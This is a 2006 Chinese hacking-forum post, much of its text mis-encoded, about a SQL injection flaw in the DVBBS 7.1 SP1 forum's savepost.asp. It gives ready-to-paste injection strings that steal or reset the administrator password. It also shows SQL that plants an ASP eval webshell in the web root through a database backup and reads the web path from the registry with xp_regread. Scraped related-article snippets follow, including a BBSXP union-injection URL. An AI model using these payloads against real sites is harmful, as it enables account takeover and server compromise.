dvbbs7.1sp1最新漏洞的研究和利用

[怪狗] 发表于2006-05-12 00:02

 

动网èºå›(DVBBS 7.1.0 SP1)Savepost.asp存在严重漏洞10-May-06
发现:Bug.Center.Team
严重程度:严重
厂商名称:动网èºå›(DVBBS)
程序版本:DVBBS 7.1.0 SP1

漏洞分析:
因为程序在savepost.asp文件中变量过滤不严,导致数æåº“处理产生漏洞,可以取得èºå›æ‰€æœ‰æƒé™ä»¥åŠwebshell。已经提交å˜æ–¹å¡æ ¸ï¼Œå¹¶é€šè¿‡ç¡è¤ï¼Œè¡¥ä¸å·²ç»å…¬å¸ƒ

厂商补丁:
http://bbs.dvbbs.net/dispbbs.asp?boardID=8&ID=1187367&page=1

看到下面:
------------------------------
If Not IsNumeric(Buy_VIPType) Then Buy_VIPType = 0
    If Buy_UserList"" Then Buy_UserList = Replace(Replace(Replace(Buy_UserList,"|||",""),"@@@",""),"$PayMoney","")
    ToolsBuyUser = "0@@@"&Buy_Orders&"@@@"&Buy_VIPType&"@@@"&Buy_UserList&"|||$PayMoney|||"
    GetMoneyType = 3
    'UseTools = ToolsInfo(4)
------------------------------------

再朝下看:
Public Sub Insert_To_Announce()
'插入回复表
DIM UbblistBody
UbblistBody = Content
UbblistBody = Ubblist(Content)
SQL="insert into "&TotalUseTable&"(Boardid,ParentID,username,topic,body,DateAndTime,length,RootID,layer,orders,ip,Expression,locktopic,signflag,emailflag,isbest,PostUserID,isupload,IsAudit,Ubblist,GetMoney,UseTools,PostBuyUser,GetMoneyType) values ("&Dvbbs.boardid&","&ParentID&",'"&username&"','"&topic&"','"&Content&"','"&DateTimeStr&"','"&Dvbbs.strlength(Content)&"',"&RootID&","&ilayer&","&iorders&",'"&Dvbbs.UserTrueIP&"','"&Expression(1)&"',"&locktopic&","&signflag&","&mailflag&",0,"&Dvbbs.userid&","&ihaveupfile&","&IsAudit&",'"&UbblistBody&"',"&ToMoney&",'"&UseTools&"','"&ToolsBuyUser&"',"&GetMoneyType&")"
Dvbbs.Execute(sql)

可以看到Buy_UserList这个变量过滤有é—题,呵呵,这个变量又导致ToolsBuyUser这个变量有é—题。的ç¡æ˜¯å¯ä»¥æ³¨å°„,呵呵。
在悔过头来看补丁里面:
insert里面有ä¿è¡¥ï¼š&dvbbs.checkstr(ToolsBuyUser)&"
看来应该是这个地方了。
åˆç”¨èµ·æ¥æœ€å¥½æ˜¯sql版本,可以updata改ç¡ç†å‘˜å¯†ç ï¼Œæˆ–者å·å¼‚备份得shell。
åˆç”¨åŠžæ³•å˜›ï¼Œå…ˆæ³¨å†Œä¸€ä¸ªid,找个版面发帖子,
帖子内å¹ä¸‹é¢æœ‰ä¸ªé€‰æ‹å¸–子类型。
选æ‹ï¼ï¼ï¼èºå›äº¤æ˜“币è¾ç½ã€‚
下面是表单内å¹ã€‚

看源代码:
-------------------------------------
选æ‹å¸–子类型
赠送金币贴
获赠金币贴
èºå›äº¤æ˜“帖è¾ç½

金币数量:

购买数量限制:(è¾ç½ä¸ºâ€œ-1”则不限制)

VIP用户浏览选项:不需要购买,需要购买

可购买用户名单限制:(每个用户名用英文逗号“,”分隔符分开,注意区分大小写)

-------------------------------------
就是这个地方了,hoho。
下面有个“可购买名单限制”,里面就填写:
xjy111',0);update/**/Dv_User/**/set/**/UserEmail=(select[Password]from/**/Dv_admin/**/where[Username]='yellowcat')/**/where[UserName]='qq156544632';--

提交成功。
看看我的Email。
晕死,居然成了çºç™½ã€‚不知道为什么哈。
来点直接的:

coolidea|||123',0);update/**/Dv_User/**/set/**/UserPassword='469e80d32c0559f8'/**/where[UserName]='qq156544632';--
这回好了,先退出,用admin888这个密码直接成功登录。
好了,语句没有é—题,大å¶çŽ°åœ¨å¯ä»¥è‡ªç”±å‘挥,会写工具的,吧delphi什么的搬出来。
直接改ç¡ç†å‘˜çš„密码进后台,可以恢复数æåº“的办法得到shell(参考angel的文章,dvbbs7.1sql版本依然可以吧)
或者å·å¼‚备份(后台可以看到web绝对路径):

create table aspshell (str image);

declare @a sysname select @a=db_name() backup database @a to disk='D:/wwwroot/dvbbs7sp1/wwwroot/qq156544632.bak;

insert into aspshell values(0x3C256576616C20726571756573742822232229253E);
declare @a sysname select @a=db_name() backup database @a to disk='D:/wwwroot/dvbbs7sp1/wwwroot/qq156544632.asp' with differential;

drop table aspshell;

另外一种得到web绝对路径办法(从职业欠钱兄弟那里看到的)
create table regread(a varchar(255),b varchar(255));
(建立一个临时表,存放读取到的信息)
insert regread exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/CONTROLSet001/Services/W3SVC/Parameters/Virtual Roots', '/'
(使用xp_regread这个函数读取注册表信息得到虚拟ç›å½•è·¯å¾„,并存入临时表中)
update dv_boke_user set boketitle=(select top 1 b from regread) where bokename='admin'

至于acess版本没有研ç¶ã€‚

[至于工具,åžåœ¨æ²¡å¿…要写,因为åˆç”¨èµ·æ¥å¾ˆç€å•ï¼ŒæŠŠæ‰€åˆç”¨çš„注入语句复制粘贴一下就可以了。对于动网SQL版,我感觉危å³æ¯”当初的上传漏洞还要严重,因为操作起来很方便。希望大å¶æœ¬ç€ä¸€ç§å­¦ä¹ æŠ€æœ¯çš„心态,不要对存在漏洞的站点åžæ–½ç ´åæ”»å‡»ï¼ï¼ï¼â€”—
http://aliwy.77169.com

时间: 2024-08-01 16:31:02

dvbbs7.1sp1最新漏洞的研究和利用的相关文章

BBSXP5.15最新漏洞精简版_漏洞研究

首先打开www.google.com在输入Po......bBsxp5.15有很多这样的论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀到底,bbsxp5.15最新漏洞 ,漏洞主要出在BLOG.ASP 可以让直接构造数据库命令     blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]    后台区长的md5密码就显示出

ssl最新漏洞曝光 可通过wifi可攻击ios设备

  ssl最新漏洞曝光咯,可通过WiFi可攻击ios设备.近来,苹果设备已经证实可以通过无线网络进行攻击,究竟是怎么回事呢?大家都很想知道原因吧,接着看下文吧. 来自Skycure的研究人员称,他们发现专门设计的SSL证书可以被攻击者所利用,通过重新生成的错误令任何程序的SSL产生崩溃崩溃.通过验证,研究人员发现这一漏洞可以变成一个更广泛的拒绝式服务攻击.虽然和安卓系统相比,iOS系统的漏洞少得多,但是这一漏洞是研究人员闻所未闻的. 是什么原因让iOS曝出漏洞,甚至被攻击呢?在iOS系统中,重复

高危漏洞通告 BIND最新漏洞将导致DoS攻击 绿盟科技发布预警通告

上个月,流行DNS软件BIND中的一个严重DoS漏洞(CVE-2016-2776)得到了修补,但是该漏洞已经被广泛利用,用以摧毁系统.绿盟科技发布高危漏洞预警通告,这意味着该漏洞影响范围比较广,危害严重,利用难度较低,7*24小时内部应急跟踪,24小时内完成技术分析.产品升级和防护方案. 该漏洞由互联网系统联盟(ISC)发现并以CVE-2016-2776的ID进行追踪.9月下旬,BIND 9.9.9-P3.9.10.4-P3.9.11.0rc3的发布修补了这一漏洞.攻击者可通过特制的DNS报文,

研究人员利用应用程序路径绕过Windows 10中的UAC机制

3月22日讯 安全专家Matt Nelson已经设计出一种最新方法,能够利用应用程序路径(App Paths)顺利绕过Windows 10系统上的用户帐户控制(简称UAC)机制. 这位研究人员详细介绍了一种与此前方案完全不同的旁路技术,项此项新方法"不依赖于IFileOperation/DLL劫持机制". Nelson在他发表的一篇博文中表示,"我之前曾在博文中提到过两项其它旁路技术,而本篇文章则着重介绍一种不依赖于IFileOperation/ELL劫持的替代性方法.这项技

游戏安全资讯精选 2017年第十五期:网络安全人才短缺是安全事件的根源,游戏行业为典型;点评最新十大Web安全隐患;MongoDB最新漏洞缓解建议

[最新活动]棋牌游戏用户五大DDoS优惠防护.点击查看原文 点评:游戏行业内,2016年,全球有记录的DDoS峰值已近600G,300G以上的DDoS攻击,在游戏行业内已经毫不稀奇. 为什么游戏会是DDoS攻击的重灾区呢?这里说几点主要的原因. 首先是因为游戏行业的攻击成本低廉,是防护成本的1/N,攻防两端极度不平衡.随着攻击方的打法越来越复杂.攻击点越来越多,基本的静态防护策略无法达到较好的效果,也就加剧了这种不平衡. 其次,游戏行业生命周期短.一款游戏从出生,到消亡,很多都是半年的时间,如果

Facebook最新对抗学习研究:无需平行语料库完成无监督机器翻译

Facebook试图将机器翻译的成功扩展到低资源语言对,研究了在没有任何平行数据的情况下,实现无监督的机器翻译.他们提出的模型有效地学习了在不使用任何标记数据的情况下进行翻译. 论文下载链接:https://arxiv.org/pdf/1711.00043.pdf 相信大家都知道,最近在机器翻译领域取得了令人印象深刻的成果,而这主要归功于最近在深度学习方面所取得巨大进步,以及大规模平行语料库(large-scale parallel corpora)的可用性.我们已经进行过无数次尝试,试图将这些

针对OpenSSL 922乌龙事件的回应 绿盟科技给出OpenSSL最新漏洞分析及防护方案

近日,OpenSSL针对22日爆出的 CVE-2016-6304漏洞 发布了补丁,补丁又带来了 新的漏洞CVE-2016-6309 和CVE-2016-7052 ,官方 随即再次发布公告 给出更新补丁,1.1.0a版本升级到1.1.0b,正在使用1.0.2i版本升级到1.0.2j,绿盟科技也再次给出新漏洞的分析及防护方案-- OpenSSL最新漏洞信息 CVE-2016-6309 提交时间:2016年9月23日 漏洞描述:当系统收到超过大约16K大小的消息时,准备接受该消息的缓冲区会在其他地方重

iOS 7被曝出现最新漏洞 最快5秒解锁

iOS 7被曝出现最新漏洞 最快5秒解锁有用户发现了iOS 7系统最新的锁屏安全漏洞,利用该漏洞可以绕过默认的密码输入界面.这次的安全漏洞最快允许攻击者5秒钟完成.当然,这已经不是iOS 7第一次被爆出有安全漏洞.这次的安全漏洞需要一些特定的条件才能正常工作.需要注意的是,通过该方法绕过锁屏后,只能访问锁屏前正在前台运行的应用.虽然不能访问整个iOS 7系统,但根据不同的应用,用户的隐私还是有危险的.经过测试后发现,iOS 7.0.6和iOS 7.1.1系统均受到影响.想要测试该漏洞,通知中心需

补丁失效!关键Apache Struts漏洞仍被大量利用

尽管已打补丁,新的Apache Struts漏洞仍被大量利用. 漏洞CVE-2017-5638是Jakarta Multipart解析器中一个远程代码执行漏洞,它是由于Content-Type头值的滥用而导致的.Apache Struts是用于构建Java Web应用程序的一个开源框架,因此影响非常广泛. Apache Struts漏洞最初是在3月6日进行发布和修补的,但是漏洞利用的报告仍层出不穷. Cisco Talos的安全研究人员一直在跟踪Apache Struts漏洞及其漏洞利用,他们发